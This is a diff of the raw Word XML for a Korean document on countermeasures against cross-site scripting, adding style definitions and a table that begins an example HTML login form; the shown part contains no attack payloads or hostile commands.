+    <w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="toc 1" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 2" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 3" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 4" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 5" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 6" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 7" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 8" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 9" w:uiPriority="39"/>
+    <w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
+    <w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
+    <w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:uiPriority="37"/>
+    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
+  </w:latentStyles>
+  <w:style w:type="paragraph" w:default="1" w:styleId="a">
+    <w:name w:val="Normal"/>
+    <w:qFormat/>
+    <w:pPr>
+      <w:widowControl w:val="0"/>
+      <w:wordWrap w:val="0"/>
+      <w:autoSpaceDE w:val="0"/>
+      <w:autoSpaceDN w:val="0"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="1">
+    <w:name w:val="heading 1"/>
+    <w:basedOn w:val="a"/>
+    <w:next w:val="a"/>
+    <w:link w:val="1Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:qFormat/>
+    <w:rsid w:val="00431F07"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:outlineLvl w:val="0"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:sz w:val="28"/>
+      <w:szCs w:val="28"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="2">
+    <w:name w:val="heading 2"/>
+    <w:basedOn w:val="a"/>
+    <w:next w:val="a"/>
+    <w:link w:val="2Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00431F07"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:outlineLvl w:val="1"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="3">
+    <w:name w:val="heading 3"/>
+    <w:basedOn w:val="a"/>
+    <w:next w:val="a"/>
+    <w:link w:val="3Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00431F07"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:ind w:leftChars="300" w:left="300" w:hangingChars="200" w:hanging="2000"/>
+      <w:outlineLvl w:val="2"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="4">
+    <w:name w:val="heading 4"/>
+    <w:basedOn w:val="a"/>
+    <w:next w:val="a"/>
+    <w:link w:val="4Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00431F07"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:ind w:leftChars="400" w:left="400" w:hangingChars="200" w:hanging="2000"/>
+      <w:outlineLvl w:val="3"/>
+    </w:pPr>
+    <w:rPr>
+      <w:b/>
+      <w:bCs/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:default="1" w:styleId="a0">
+    <w:name w:val="Default Paragraph Font"/>
+    <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+  </w:style>
+  <w:style w:type="table" w:default="1" w:styleId="a1">
+    <w:name w:val="Normal Table"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:tblPr>
+      <w:tblInd w:w="0" w:type="dxa"/>
+      <w:tblCellMar>
+        <w:top w:w="0" w:type="dxa"/>
+        <w:left w:w="108" w:type="dxa"/>
+        <w:bottom w:w="0" w:type="dxa"/>
+        <w:right w:w="108" w:type="dxa"/>
+      </w:tblCellMar>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="numbering" w:default="1" w:styleId="a2">
+    <w:name w:val="No List"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="1Char">
+    <w:name w:val="제목 1 Char"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="1"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00431F07"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:sz w:val="28"/>
+      <w:szCs w:val="28"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="2Char">
+    <w:name w:val="제목 2 Char"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="2"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00431F07"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="3Char">
+    <w:name w:val="제목 3 Char"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="3"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00431F07"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="4Char">
+    <w:name w:val="제목 4 Char"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="4"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00431F07"/>
+    <w:rPr>
+      <w:b/>
+      <w:bCs/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="table" w:styleId="a3">
+    <w:name w:val="Table Grid"/>
+    <w:basedOn w:val="a1"/>
+    <w:uiPriority w:val="59"/>
+    <w:rsid w:val="00431F07"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:tblPr>
+      <w:tblBorders>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+      </w:tblBorders>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="a4">
+    <w:name w:val="List Paragraph"/>
+    <w:basedOn w:val="a"/>
+    <w:uiPriority w:val="34"/>
+    <w:qFormat/>
+    <w:rsid w:val="00431F07"/>
+    <w:pPr>
+      <w:ind w:leftChars="400" w:left="800"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="a5">
+    <w:name w:val="Balloon Text"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="Char"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="009A2F22"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
+    <w:name w:val="풍선 도움말 텍스트 Char"/>
     <w:basedOn w:val="a0"/>
     <w:link w:val="a5"/>
     <w:uiPriority w:val="99"/>
@@ -5359,7 +5497,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{1206FFCC-D365-A640-ADAA-3C5FD948CD95}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{3E2E5BCD-74F5-4615-8157-3CB2514B71B0}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/WebFilter/크로스 사이트 스크립팅 대응방안.docx
+++ b/WebFilter/크로스 사이트 스크립팅 대응방안.docx
@@ -195,6 +195,739 @@
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>로그인 페이지</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a3"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1101"/>
+        <w:gridCol w:w="9576"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="10664" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>&lt;html&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="500" w:left="1000"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>&lt;head&gt;Login Page&lt;/head&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="500" w:left="1000"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>&lt;body&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="600" w:left="1200"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>&lt;form action=</w:t>
+            </w:r>
+            <w:r>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>login_submit.php</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> method=</w:t>
+            </w:r>
+            <w:r>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>post</w:t>
+            </w:r>
+            <w:r>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="700" w:left="1400"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>&lt;label&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>UserName</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> :&lt;/label&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="700" w:left="1400"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>&lt;input type=</w:t>
+            </w:r>
+            <w:r>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>text</w:t>
+            </w:r>
+            <w:r>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> name=</w:t>
+            </w:r>
+            <w:r>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>username</w:t>
+            </w:r>
+            <w:r>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>/&gt;&lt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>br</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> /&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="700" w:left="1400"/>
+              <w:rPr>
